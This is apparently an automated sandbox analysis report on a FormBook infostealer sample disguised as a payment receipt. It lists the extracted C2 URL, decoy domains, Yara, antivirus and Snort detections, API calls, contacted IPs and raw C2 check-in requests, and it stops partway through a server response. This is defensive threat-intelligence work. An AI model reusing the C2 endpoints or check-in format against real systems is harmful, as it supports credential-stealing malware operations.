Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp |
Malware Configuration Extractor: FormBook {"C2 list": ["www.bbyyn10.xyz/b0us/"], "decoy": ["wxoi.xyz", "boss-note-to-look-today.info", "rxgmarket.com", "vyfstudio.com", "insularrofioa.xyz", "psikologtenaysude.com", "hepatitiscsignssymptoms.space", "toadvalleyfarm.com", "rhinobeds.com", "joystoreworld.com", "wethinky.com", "cucciolamores.com", "finansresultation.com", "criptodigital.online", "cave21shop.com", "ryannaat.xyz", "xn--ngbr0em.com", "olympiaapartment.com", "asrendo.com", "dashmints.com", "hampadco.com", "hoanghuong.group", "yamamoto-d-c.net", "cynthiaessential.com", "malatirada.com", "c5group-th.com", "v9ayiditq3.com", "tucows.website", "patinamedicalgroup.com", "xn--vckvb6c8f088nlxg8mqrw1d.com", "securetravel.trade", "eachallness.center", "vongquaymembersshipvn.com", "sexbattu.com", "libertymattersmost.net", "improvfilmproduction.com", "cryptohealthplan.com", "pandabearsoftware.com", "mininoheya.com", "chimichael.com", "rescueandrestoreministries.net", "alookbehindtheseams.com", "unimedplanos.net", "bobazzing.com", "cabidat.xyz", "playgroundcrew.website", "tsoharformation.com", "ninjadigital.agency", "inkedbreadcompany.com", "kirieducationschool.com", "genitalestetikbodrum.com", "agronotion.com", "bentonvillesquareartist.com", "harekrishnajapayagna.com", "fflashes.net", "stogelair.com", "stkittsaquaculture.com", "peiyaousa.com", "publicschools.fail", "bankhelpassist.xyz", "ip-sat.com", "redeyeops.com", "kavirab.com", "thefurniturepractice-btr.com"]} |
Source: Yara match |
File source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY |
Source: 1.0.Betalingskvittering.exe.400000.0.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 1.1.Betalingskvittering.exe.400000.0.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 7.2.cmd.exe.295d8d0.1.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 1.0.Betalingskvittering.exe.400000.3.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.5.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.2.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 1.0.Betalingskvittering.exe.400000.6.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.1.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 7.2.cmd.exe.31b796c.4.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 1.2.Betalingskvittering.exe.400000.0.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.4.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004035EB GetEncryptedFileVersionExt,lstrcatA,lstrlenA,lstrcmpiA,GetFileAttributesA,LoadImageA,RegisterClassA,SystemParametersInfoA,CreateWindowExA,ShowWindow,GetClassInfoA,GetClassInfoA,GetClassInfoA,RegisterClassA,DialogBoxParamA, |
0_2_004035EB |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, |
0_2_004030FB |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00404F56 GetEncryptedFileVersionExt,OleInitialize,OleUninitialize, |
0_2_00404F56 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00401000 DefWindowProcA,GetEncryptedFileVersionExt,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, |
0_2_00401000 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_0040140B GetEncryptedFileVersionExt, |
0_2_0040140B |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00402836 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt, |
0_2_00402836 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00404FC2 GetEncryptedFileVersionExt,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, |
0_2_00404FC2 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004047D3 GetDlgItem,GetDlgItem,GetDlgItem,SendMessageA,GetEncryptedFileVersionExt,GlobalAlloc,LoadBitmapA,SetWindowLongA,ImageList_Create,ImageList_AddMasked,SendMessageA,SendMessageA,SendMessageA,DeleteObject,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowLongA,SetWindowLongA,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ImageList_Destroy,GlobalFree,SendMessageA,SendMessageA,SendMessageA,InvalidateRect,ShowWindow,ShowWindow,GetDlgItem,ShowWindow, |
0_2_004047D3 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004012E2 GetEncryptedFileVersionExt, |
0_2_004012E2 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004058E6 GetShortPathNameA,CloseHandle,GetShortPathNameA,GetShortPathNameA,wsprintfA,GetEncryptedFileVersionExt,GetFileSize,GlobalAlloc,ReadFile,SetFilePointer,WriteFile,GlobalFree,CloseHandle, |
0_2_004058E6 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,GetEncryptedFileVersionExt,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, |
0_2_00404292 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00403F9C CheckDlgButton,GetDlgItem,SendMessageA,SendMessageA,GetEncryptedFileVersionExt,GetSysColor,SendMessageA,SendMessageA,lstrlenA,SendMessageA,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,LoadCursorA,LoadCursorA,SetCursor,SetCursor,ShellExecuteA,LoadCursorA,SetCursor,SendMessageA,SendMessageA, |
0_2_00403F9C |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004038B4 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt,SetWindowTextA, |
0_2_004038B4 |
Source: |
Binary string: wntdll.pdbUGP source: Betalingskvittering.exe, 00000000.00000003.352403148.000000000F050000.00000004.00000001.sdmp, Betalingskvittering.exe, 00000001.00000002.408971728.0000000000940000.00000040.00000001.sdmp, cmd.exe, 00000007.00000002.613167685.0000000002BF0000.00000040.00000001.sdmp |
Source: |
Binary string: cmd.pdbUGP source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe, 00000007.00000000.408444946.00000000002A0000.00000040.00020000.sdmp |
Source: |
Binary string: wntdll.pdb source: Betalingskvittering.exe, cmd.exe |
Source: |
Binary string: cmd.pdb source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00405E93 FindFirstFileA,FindClose, |
0_2_00405E93 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, |
0_2_004054BD |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00402671 FindFirstFileA, |
0_2_00402671 |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, |
7_2_002B245C |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, |
7_2_002B68BA |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, |
7_2_002AB89C |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, |
7_2_002A85EA |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002C31DC FindFirstFileW,FindNextFileW,FindClose, |
7_2_002C31DC |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_004161D7 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_00416218 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_004162E4 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop ebx |
1_2_00406AB5 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_0040C3E8 |
Source: Traffic |
Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80 |
Source: Traffic |
Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80 |
Source: Traffic |
Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80 |
Source: Traffic |
Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80 |
Source: Traffic |
Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80 |
Source: Traffic |
Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80 |
Source: Traffic |
Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80 |
Source: C:\Windows\explorer.exe |
Network Connect: 198.54.117.217 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Domain query: www.bbyyn10.xyz |
|
Source: C:\Windows\explorer.exe |
Domain query: www.chimichael.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 50.87.176.30 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Network Connect: 104.21.45.211 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Domain query: www.inkedbreadcompany.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.malatirada.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 23.227.38.74 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Domain query: www.insularrofioa.xyz |
|
Source: C:\Windows\explorer.exe |
Domain query: www.bobazzing.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 35.186.238.101 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Network Connect: 192.0.78.25 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Network Connect: 142.4.98.67 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Domain query: www.finansresultation.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 34.102.136.180 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Network Connect: 104.21.40.182 80 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Domain query: www.improvfilmproduction.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.rxgmarket.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.joystoreworld.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.tucows.website |
|
Source: C:\Windows\explorer.exe |
Domain query: www.olympiaapartment.com |
|
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1Host: www.bobazzing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1Host: www.improvfilmproduction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1Host: www.olympiaapartment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1Host: www.malatirada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1Host: www.finansresultation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1Host: www.rxgmarket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1Host: www.joystoreworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1Host: www.bbyyn10.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1Host: www.inkedbreadcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1Host: www.insularrofioa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774856-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:50:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:47 GMTContent-Type: text/htmlContent-Length: 275ETag: "6175c221-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:51:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz3Z9xDKX9qXLWedJeYbmqe4wi2s4eO3jBbJQMiMyNHDIEsXgBZ7mHx2nwoUFffwMZYPSWVaKAbLAX3R7%2F6l%2FOwe3bPbgDMXRJvrUpWhVkm4%2BufBQexlKs5sYLWh88gtWNOc0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4d15a21fe05bf1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 78 67 6d 61 72 6b 65 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 107<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rxgmarket.com Port 80</address></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 27 Oct 2021 15:51:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Request-ID: d3f121e3-1b05-4bdd-beea-f59c42222099X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6a4d15c3ce834e0e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 